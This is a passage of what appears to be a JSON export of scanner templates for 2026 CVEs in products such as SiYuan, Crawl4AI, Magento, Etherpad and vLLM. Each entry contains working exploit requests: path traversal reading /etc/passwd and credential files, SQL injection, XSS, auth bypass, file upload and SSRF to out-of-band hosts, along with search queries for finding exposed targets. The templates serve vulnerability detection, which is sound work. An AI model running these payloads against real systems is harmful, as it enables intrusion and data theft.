bVzBg92Gu03qy419i+RdQSwMEFAAAAAgAoqMIXeCNt9jPAAAATQEAABwAAAB3b3JkL19yZWxzL2RvY3VtZW50LnhtbC5yZWxzjZCxTgMxEER7vsLaPreXFAihOGkg0hU0KHzAYu/5rNhry3bQ5e9xgwSIgnK0s29Gsz+uMagPLtUn0bAdRlAsJlkvTsPb+bR5AFUbiaWQhDXcuMLxcLd/5UCt/9TF56o6RKqGpbX8iFjNwpHqkDJLv8ypRGpdFoeZzIUc424c77F8Z8AvqJqshjLZKbotqPMt83/4aZ694adkrpGl/RGDPvb8DqTiuGnAay1YFyqM2a+RusPyuyfZhOTSkMV9eV+S7RWe18ZFKAD2vvhjhcMnUEsBAhQDFAAAAAgAoqMIXReYANfrAAAAsgEAABMAAAAAAAAAAAAAAIABAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECFAMUAAAACACiowhdP63++q8AAAAsAQAACwAAAAAAAAAAAAAAgAEcAQAAX3JlbHMvLnJlbHNQSwECFAMUAAAACACiowhdkp50rMABAABqBAAAEQAAAAAAAAAAAAAAgAH0AQAAd29yZC9kb2N1bWVudC54bWxQSwECFAMUAAAACACiowhd4I232M8AAABNAQAAHAAAAAAAAAAAAAAAgAHjAwAAd29yZC9fcmVscy9kb2N1bWVudC54bWwucmVsc1BLBQYAAAAABAAEAAMBAADsBAAAAAA=\")}}\n        --testforgeboundary--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_disposition, \"attachment; filename=\")'\n          - 'contains(content_type, \"application/pdf\")'\n          - 'contains(body, \"/Subtype/Image\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100e20820fde31c635f9b2312fa2c3f26e8fc9ab56349778a149dfc5ea9def0adf3022100c60f314427d7c2f15c3fa816f0c2fc5d84ff0d1f8d82e89e3cc628a4504e5cd9:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-55229.yaml","vuln_id":"cve-2026-55229"},{"raw":"id: CVE-2026-55224\n\ninfo:\n  name: MineAdmin < 3.2.0-alpha.2 - Plugin Path Traversal to RCE\n  author: afanti\n  severity: high\n  description: |\n    MineAdmin versions before 3.2.0-alpha.2 contain a path traversal vulnerability in the app-store plugin service. The identifier parameter is concatenated into filesystem paths without sanitization.\n  impact: |\n    Authenticated users can escape the plugin directory to read or manipulate arbitrary files/directories.\n  remediation: |\n    Upgrade MineAdmin to version 3.2.0-alpha.2 or later.\n  reference:\n    - https://github.com/advisories/GHSA-59xm-4m8c-g3xj\n    - https://github.com/mineadmin/MineAdmin/pull/728\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-55224\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-55224\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: mineadmin\n    product: mineadmin\n    shodan-query: http.html:\"MineAdmin\"\n    fofa-query: body=\"MineAdmin\"\n  tags: cve,cve2026,mineadmin,path-traversal,rce,default-login\n\nvariables:\n  username:\n  password:\n  token: \"\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /admin/passport/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json\n\n        {\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(content_type, \"application/json\")\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: token\n        part: body\n        json:\n          - '.data.access_token'\n        internal: true\n\n  - raw:\n      - |\n        POST /admin/plugin/store/download HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json\n        Authorization: Bearer {{token}}\n\n        {\"identifier\":\"../app\",\"version\":\"1.0.0\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains_all(body, \"result\", \"true\")\n          - '!contains(body, \"params_fail\")'\n        condition: and\n# digest: 4b0a0048304602210096969bdbaebed1958ff8f225c847200461a9ec29f3ffdb71b0ddcc9444db514702210088dc954e3696ec750d74005383cb36ceedd1c04478f70d957a79f2dda2b7f30e:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-55224.yaml","vuln_id":"cve-2026-55224"},{"raw":"id: CVE-2026-55087\n\ninfo:\n  name: Etherpad 2.1.0 <= 3.0.0 - Cross-Site Scripting\n  author: Haseeb-1698\n  severity: medium\n  description: |\n    Etherpad versions 2.1.0 through 3.0.0 reflect the x-proxy-path request header into admin HTML, JavaScript, and CSS responses without sanitization. An attacker can abuse this behavior to inject crafted content into generated resource URLs, enabling cross-site scripting and cache poisoning scenarios.\n  remediation: |\n    Upgrade to Etherpad 3.1.0 or later.\n  reference:\n    - https://github.com/ether/etherpad/security/advisories/GHSA-fjgc-3mj7-8rg8\n    - https://github.com/ether/etherpad/commit/8c6104c5d5daf41f0d454acc04d42dffa0e0d996\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-55087\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-55087\n    epss-score: 0.00523\n    epss-percentile: 0.4337\n    cwe-id: CWE-79,CWE-444,CWE-601\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: ether\n    product: etherpad\n    shodan-query: http.title:\"Etherpad\"\n    fofa-query: title=\"Etherpad\"\n  tags: cve,cve2026,etherpad,xss\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/admin/\"\n\n    headers:\n      x-proxy-path: '/\"><script>alert(document.domain)</script>'\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_all(body, 'src=\\\"/\\\\\\\"><script>alert(document.domain)</script>/admin/', 'href=\\\"/\\\\\\\"><script>alert(document.domain)</script>/admin/')\"\n          - \"contains(header, 'text/html')\"\n          - \"status_code == 200\"\n        condition: and\n# digest: 4b0a004830460221008a5118deea6a883890f494b9a0b1da249cb41fa525980a23873a13808f9e8d5b022100e3d1e91d9fcc1f6ebcc29c0cd338d318e73318df6586c6ba264c00da572a6def:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-55087.yaml","vuln_id":"cve-2026-55087"},{"raw":"id: CVE-2026-54917\n\ninfo:\n  name: SeaweedFS <= 4.29 - Path Traversal File Write\n  author: Haseeb-1698,DhiyaneshDk\n  severity: high\n  description: |\n    SeaweedFS versions through 4.29 build the S3 API and Iceberg REST catalog routers with mux.NewRouter().SkipClean(true), which disables URL path cleaning. A `..` segment in the request path therefore survives routing and reaches the handlers unnormalised, so a request such as `PUT /bucket-A/../evil-bucket/key` is matched as bucket=bucket-A with object=../evil-bucket/key. The captured object key is then joined into a filer path where the `..` is collapsed server-side, so the write lands in evil-bucket while authorisation is evaluated against bucket-A, enabling cross-bucket file write.\n  impact: |\n    An unauthenticated attacker can write objects to buckets other than the one named in the request path, bypassing bucket-level access controls.\n  remediation: |\n    Upgrade to SeaweedFS 4.30 or later.\n  reference:\n    - https://github.com/advisories/GHSA-w62w-66v9-vvgv\n    - https://github.com/seaweedfs/seaweedfs/commit/dd1b4287899eed3dfd73c2f3b1de001996fda229\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-54917\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N\n    cvss-score: 7.8\n    cve-id: CVE-2026-54917\n    epss-score: 0.01219\n    epss-percentile: 0.67329\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: seaweedfs\n    product: seaweedfs\n    shodan-query: server:\"SeaweedFS\"\n    fofa-query: server=\"SeaweedFS\"\n  tags: cve,cve2026,seaweedfs,traversal\n\nvariables:\n  bucket_a: \"{{to_lower(rand_base(8))}}\"\n  bucket_b: \"{{to_lower(rand_base(8))}}\"\n  file_key: \"{{to_lower(rand_base(8))}}\"\n\nhttp:\n  - raw:\n      - |\n        PUT /{{bucket_a}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Length: 0\n      - |\n        PUT /{{bucket_a}}/../{{bucket_b}}/{{file_key}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/plain\n        Content-Length: {{len(file_key)}}\n\n        {{file_key}}\n      - |\n        GET /{{bucket_b}}/{{file_key}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code_3 == 200\"\n          - \"contains(body_3, file_key)\"\n          - \"contains(header_3, 'SeaweedFS')\"\n        condition: and\n# digest: 4b0a00483046022100f38ae8a480426173a9b34c66ea31e5d3e649b21f4aeb33c75180f038b21c875b0221008a04404b57cd061f686273538a64d446f0c1c8ba4ff677651ffabff1a5171f64:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-54917.yaml","vuln_id":"cve-2026-54917"},{"raw":"id: CVE-2026-54836\n\ninfo:\n  name: YMC Filter - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    YMC Filter <= 3.11.5 contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.\n  impact: |\n    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.\n  remediation: |\n    Update to the latest version beyond 3.11.5.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-54836\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L\n    cvss-score: 9.3\n    cve-id: CVE-2026-54836\n    epss-score: 0.01343\n    epss-percentile: 0.70121\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,wordpress,wp-plugin,sqli,ymc-smart-filter,unauth\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        POST /wp-json/ymc/v1/posts/filter HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"params\":{\"filter_id\":{{fid}},\"search\":\"xyznotexist999') OR (SELECT 1 FROM (SELECT SLEEP(7))x)))-- -\",\"post_types\":[\"post\"],\"paged\":1}}\n\n    payloads:\n      fid:\n        - \"1\"\n        - \"2\"\n        - \"3\"\n        - \"10\"\n        - \"50\"\n        - \"100\"\n        - \"150\"\n        - \"152\"\n        - \"200\"\n        - \"250\"\n        - \"300\"\n        - \"500\"\n\n    stop-at-first-match: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=7'\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"success\\\":true\")'\n        condition: and\n# digest: 4a0a00473045022038f39cac176d3b75aa3afb864bb6479228ea3a995a3d41562eb13dce6520680d022100865cdab113c8d91a1a55571fe41b615f1350e43923d95f4c1ba5514e01995f63:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-54836.yaml","vuln_id":"cve-2026-54836"},{"raw":"id: CVE-2026-54236\n\ninfo:\n  name: vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak\n  author: kenlacroix\n  severity: medium\n  description: |\n    vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added sanitize_message to the OpenAI router but the Anthropic-compatible router (/v1/messages) echoes str(exc) directly.\n  impact: |\n    Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution.\n  remediation: |\n    Update to vllm version to latest.\n  reference:\n    - https://github.com/advisories/GHSA-hgg8-fqqc-vfmw\n    - https://github.com/vllm-project/vllm/pull/45119\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-54236\n    epss-score: 0.00927\n    epss-percentile: 0.58991\n    cwe-id: CWE-532\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: vllm\n    product: vllm\n    shodan-query: http.html:\"/v1/models\" http.html:\"vllm\"\n    tags: cve,cve2026,vllm,llm,ai,info-leak,anthropic,intrusive\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /v1/models HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"id\\\":\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: model\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '\"id\"\\s*:\\s*\"([^\"]+)\"'\n\n  - raw:\n      - |\n        POST /v1/messages HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"model\":\"{{model}}\",\"max_tokens\":1,\"messages\":[{\"role\":\"user\",\"content\":[{\"type\":\"text\",\"text\":\"{{randstr}}\"},{\"type\":\"image\",\"source\":{\"type\":\"base64\",\"media_type\":\"image/png\",\"data\":\"bm90YW5pbWFnZQ==\"}}]}]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 500'\n          - 'contains_all(body, \"_io.BytesIO object at 0x\", \"internal_error\")'\n        condition: and\n# digest: 4b0a00483046022100f4c5e4a409f3e512b8c0d668069d92ed6025d349e2fb17ca2773655cda85c56a022100a4a21fd51e2c9f5193a939db9006d8a7d150646528f9f8af025530c4076ce37e:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-54236.yaml","vuln_id":"cve-2026-54236"},{"raw":"id: CVE-2026-54157\n\ninfo:\n  name: LobeHub LobeChat <= 2.1.56 - Server-Side Request Forgery\n  author: 0xj3st3r\n  severity: medium\n  description: |\n    LobeHub LobeChat versions up to and including 2.1.56 are vulnerable to an unauthenticated server-side request forgery vulnerability in the /webapi/proxy endpoint. The endpoint accepts a URL in the POST request body and fetches it server-side without authentication.\n  impact: |\n    An unauthenticated attacker can cause the server to perform arbitrary outbound HTTP requests.\n  remediation: |\n    Upgrade LobeHub LobeChat to version 2.1.57 or later.\n  reference:\n    - https://github.com/lobehub/lobehub/security/advisories/GHSA-xmwj-c75x-6346\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-54157\n  classification:\n    cve-id: CVE-2026-54157\n    epss-score: 0.0183\n    epss-percentile: 0.77919\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: lobehub\n    product: lobe-chat\n    fofa-query: icon_hash=\"1975020705\"\n  tags: cve,cve2026,lobechat,ssrf,vuln,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /welcome HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(tolower(body), \"lobechat\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /webapi/proxy HTTP/1.1\n        Host: {{Hostname}}\n\n        http://oast.me\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"<h1> Interactsh Server </h1>\")'\n        condition: and\n# digest: 4a0a00473045022100a4a839795c16bb387a8b2ae379dd43d083f6c04050fad6cb10e59cbd4d4bd57e02202ab23e03dfaa97baab867f951e554588664b4d9b43f7f33b9b8616bcc16b2708:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-54157.yaml","vuln_id":"cve-2026-54157"},{"raw":"id: CVE-2026-54069\n\ninfo:\n  name: SiYuan Note <= 3.6.5 - Authentication Bypass\n  author: 0x_Akoko\n  severity: high\n  description: |\n    SiYuan Note 3.6.5 and prior is vulnerable to authentication bypass. The CheckAuth middleware unconditionally trusted all chrome-extension:// origins, granting RoleAdministrator access without token validation to any request with a spoofed Origin header. Fixed in v3.7.0.\n  impact: |\n    Attackers can access all admin API endpoints, enabling full data exfiltration, stored XSS injection, and configuration tampering.\n  remediation: |\n    Update to SiYuan Note v3.7.0 or later.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hvr9-72v2-fff3\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-54069\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-54069\n    epss-score: 0.00579\n    epss-percentile: 0.46371\n    cwe-id: CWE-346\n  metadata:\n    verified: false\n    max-request: 1\n    vendor: siyuan-note\n    product: siyuan\n    shodan-query: title:\"SiYuan\"\n    fofa-query: title=\"SiYuan\" || body=\"siyuan\"\n  tags: cve,cve2026,siyuan,auth-bypass,unauth\n\nhttp:\n  - raw:\n      - |\n        POST /api/system/getConf HTTP/1.1\n        Host: {{Hostname}}\n        Origin: chrome-extension://auth-test\n        Content-Type: application/json\n\n        {}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"\\\"code\\\":0\")'\n          - 'contains_all(body, \"\\\"conf\\\"\", \"\\\"system\\\"\", \"\\\"kernelVersion\\\"\")'\n        condition: and\n# digest: 4a0a004730450221008e099acb6c062f0b06e2f94f7c72ac968b3d6c50325e9b3153e126d0dfa857b702201bafa9824349a1bc87270f5de40b1ee4899cbc5b6f1b8096ce87d15119e539e0:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-54069.yaml","vuln_id":"cve-2026-54069"},{"raw":"id: CVE-2026-54066\n\ninfo:\n  name: SiYuan <= 3.6.5 - Unauthenticated Path Traversal\n  author: 0x_Akoko\n  severity: high\n  description: |\n    SiYuan <= 3.6.5 contains a path traversal via double URL-encoding in the /assets/ route (publish mode port 6808), allowing unauthenticated attackers to read arbitrary files inside WorkspaceDir including conf/conf.json which exposes the API token and access auth code.\n  impact: |\n    Unauthenticated attackers can read conf/conf.json exposing the API token, accessAuthCode SHA256 hash, and sync credentials, enabling full authenticated API access to all notebooks.\n  remediation: |\n    Update to SiYuan v3.7.0 or later.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-p4m3-mgmm-c664\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-54066\n    epss-score: 0.02386\n    epss-percentile: 0.83187\n    cwe-id: CWE-22\n  metadata:\n    verified: false\n    max-request: 1\n    vendor: siyuan-note\n    product: siyuan\n    shodan-query: port:6808 \"SiYuan\"\n    fofa-query: title=\"SiYuan\" && port=\"6808\"\n    tags: cve,cve2026,siyuan,path-traversal,lfi,unauth,publish-mode,disclosure,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /assets/%252e%252e/%252e%252e/conf/conf.json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"accessAuthCode\", \"appearance\", \"editor\", \"system\")'\n        condition: and\n# digest: 4a0a00473045022100b6a849e8dbc4233df34ae4d83e91f0a83447addc02ed2e93f05d6699b4483b9602203c9e7df03daeef17e07fc77fe2faf17f24e3db04dec002a6282f477dbbc9eb05:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-54066.yaml","vuln_id":"cve-2026-54066"},{"raw":"id: CVE-2026-53976\n\ninfo:\n  name: OpenChamber <1.13.0 - Unauthenticated Arbitrary File Read\n  author: str4k3r\n  severity: critical\n  description: |\n    OpenChamber 1.11.7 contains a path traversal vulnerability in the file-serving endpoints /api/fs/read, /api/fs/stat, and /api/fs/raw that allows unauthenticated remote attackers to read arbitrary files by supplying the allowOutsideWorkspace=true query parameter alongside an absolute path, bypassing the workspace boundary check in resolveReadPathFromContext. Attackers can exploit the vacuous isPathWithinRoot guard to read sensitive files such as the JWT signing secret, SSH private keys, API credentials, and environment variables, enabling full authentication bypass by forging session cookies on password-protected deployments.\n  impact: |\n    Unauthenticated attackers can read sensitive files and bypass authentication, leading to full system compromise.\n  remediation: |\n    Update to the latest version that fixes this vulnerability.\n  reference:\n    - https://www.vulncheck.com/advisories/openchamber-path-traversal-file-read-via-allowoutsideworkspace-parameter\n    - https://github.com/openchamber/openchamber/commit/f1b9506132faf6c564a2694c7f33b94421a49b4a\n    - https://github.com/openchamber/openchamber\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-53976\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-53976\n    epss-score: 0.01899\n    epss-percentile: 0.78759\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.title:\"OpenChamber\"\n    product: openchamber\n    vendor: openchamber\n    fofa-query: title=\"OpenChamber\"\n  tags: cve,cve2026,openchamber,lfi,traversal,unauth,oss\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/fs/read?allowOutsideWorkspace=true&path=/etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100c8a1df8aa3c05ace996506226fefd10b821afb9a5c2007927eeb93583598dbfa02204573de1945ee1c281c5ab7ecc6d8f5820a5cf2778e91bb3a3c6b9e1b60f34663:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-53976.yaml","vuln_id":"cve-2026-53976"},{"raw":"id: CVE-2026-53787\n\ninfo:\n  name: Magento 2 Amasty Order Attributes < 4.0.0 - Unauthenticated Arbitrary File Upload\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    Amasty Order Attributes for Magento 2 < 4.0.0 contains an unrestricted file upload vulnerability caused by lack of authentication and validation in the upload endpoint, letting unauthenticated attackers upload arbitrary files including PHP, enabling remote code execution or malware hosting.\n  impact: |\n    Unauthenticated attackers can upload malicious files, potentially leading to remote code execution, malware hosting, or stored cross-site scripting.\n  remediation: |\n    Update to version 4.0.0 or later.\n  reference:\n    - https://sansec.io/research/amasty-order-attributes-file-upload\n    - https://www.vulncheck.com/advisories/amasty-order-attributes-for-magento-2-unauthenticated-arbitrary-file-upload\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-53787\n  classification:\n    cvss-metrics: \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\"\n    cvss-score: 9.8\n    cve-id: CVE-2026-53787\n    epss-score: 0.05638\n    epss-percentile: 0.92608\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: amasty\n    product: order-attributes\n    shodan-query: http.component:\"Magento\"\n    google-query: inurl:\"/rest/V1/amasty_orderattr\"\n  tags: cve,cve2026,magento,amasty,file-upload,rce,unauth,intrusive\n\nvariables:\n  c1: \"{{to_lower(rand_text_alpha(1))}}\"\n  c2: \"{{to_lower(rand_text_alpha(1))}}\"\n  rest: \"{{to_lower(rand_text_alpha(6))}}\"\n  filename: \"{{c1}}{{c2}}{{rest}}.txt\"\n\nflow: http(1) && (http(2) || http(3) || http(4)) && http(5)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(to_lower(body), \"magento\", \"mage-\", \"checkout\", \"data-mage-init\") || contains_any(to_lower(header), \"x-magento\", \"magento\")'\n        internal: true\n        condition: and\n\n  - raw:\n      - |\n        POST /rest/V1/amasty_orderattr/uploadFile HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"fileContent\":{\"base64_encoded_data\":\"Q1ZFLTIwMjYtNTM3ODctdGVzdA==\",\"fileName_with_extension\":\"{{filename}}\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, filename)'\n          - 'contains(content_type, \"application/json\")'\n        internal: true\n        condition: and\n\n  - raw:\n      - |\n        POST /rest/all/V1/amasty_orderattr/uploadFile HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"fileContent\":{\"base64_encoded_data\":\"Q1ZFLTIwMjYtNTM3ODctdGVzdA==\",\"fileName_with_extension\":\"{{filename}}\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, filename)'\n          - 'contains(content_type, \"application/json\")'\n        internal: true\n        condition: and\n\n  - raw:\n      - |\n        POST /rest/default/V1/amasty_orderattr/uploadFile HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"fileContent\":{\"base64_encoded_data\":\"Q1ZFLTIwMjYtNTM3ODctdGVzdA==\",\"fileName_with_extension\":\"{{filename}}\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, filename)'\n          - 'contains(content_type, \"application/json\")'\n        internal: true\n        condition: and\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/media/amasty_checkout/{{c1}}/{{c2}}/{{filename}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"CVE-2026-53787-test\")'\n          - 'contains(content_type, \"text/plain\")'\n        condition: and\n# digest: 490a004630440220684c83ee942c84c0b3a61e3dce795592089ccb15d83fc47b48d3409efd72f7f802207d02dcd53f09d8955f79fe23b6111b6e73055b910c4949e4b51e2b325085423a:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-53787.yaml","vuln_id":"cve-2026-53787"},{"raw":"id: CVE-2026-53755\n\ninfo:\n  name: crawl4ai < 0.8.9 - Server Side Request Forgery\n  author: str4k3r\n  severity: high\n  description: |\n    Crawl4AI < 0.8.9 contains a server-side request forgery caused by insufficient SSRF destination checks on proxy addresses in browser and crawler configurations, letting unauthenticated attackers access internal services and cloud metadata endpoints.\n  impact: |\n    Unauthenticated attackers can access internal services and cloud metadata, potentially leading to sensitive information disclosure and further network compromise.\n  remediation: |\n    Update to version 0.8.9 or later.\n  reference:\n    - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-6qhc-x826-342c\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N\n    cvss-score: 8.2\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: 'title:\"crawl4ai\"'\n    fofa-query: 'body=\"crawl4ai\"'\n  tags: cve,cve2026,crawl4ai,ssrf,unauth,proxy,oast\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(body, \"crawl4ai\", \"Crawl4AI\", \"Crawl4ai\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /crawl HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"urls\":[\"http://example.com\"],\"browser_config\":{\"type\":\"BrowserConfig\",\"params\":{\"headless\":true,\"extra_args\":[\"--proxy-server=http://{{interactsh-url}}\"]}},\"crawler_config\":{\"type\":\"CrawlerRunConfig\",\"params\":{\"cache_mode\":\"BYPASS\",\"page_timeout\":8000}}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(interactsh_protocol, \"http\", \"dns\")'\n        condition: and\n# digest: 4b0a004830460221009cd88779212738ddc672b260bbd0539d9b9f9dcdc313aca41c11ffbde7b41238022100809e760afdced137ad13f90ca172446eaf734cbb8c166f6a1ef982c146024bd0:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-53755.yaml","vuln_id":"cve-2026-53755"},{"raw":"id: CVE-2026-53753\n\ninfo:\n  name: Crawl4AI <= 0.8.6 - Remote Code Execution\n  author: aryu-ru,q1uf3ng,August829\n  severity: critical\n  description: |\n    Crawl4AI through 0.8.6 ships a Docker API server that exposes an unauthenticated /crawl endpoint. The computed field type of JsonCssExtractionStrategy evaluates a user supplied expression inside an AST based sandbox that does not restrict attribute access on generator frame objects. A generator expression can therefore reach gi_frame.f_back, walk the caller chain to f_builtins, recover __import__ and execute arbitrary operating system commands as the user running the container.\n  impact: |\n    An unauthenticated attacker can execute arbitrary operating system commands inside the crawler container, read or tamper with crawled data, steal provider API keys held in the container environment, and pivot into any network the container can reach.\n  remediation: |\n    Upgrade Crawl4AI to version 0.8.7 or later, where computed field expressions are disabled.\n  reference:\n    - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-qxjp-w3pj-48m7\n    - https://github.com/unclecode/crawl4ai/pull/1855\n    - https://github.com/unclecode/crawl4ai/pull/1886\n    - https://github.com/pypa/advisory-database/tree/main/vulns/crawl4ai/PYSEC-2026-319.yaml\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-53753\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-53753\n    epss-score: 0.029\n    epss-percentile: 0.86347\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: unclecode\n    product: crawl4ai\n    shodan-query: http.title:\"Crawl4AI Playground\"\n    fofa-query: title=\"Crawl4AI Playground\"\n  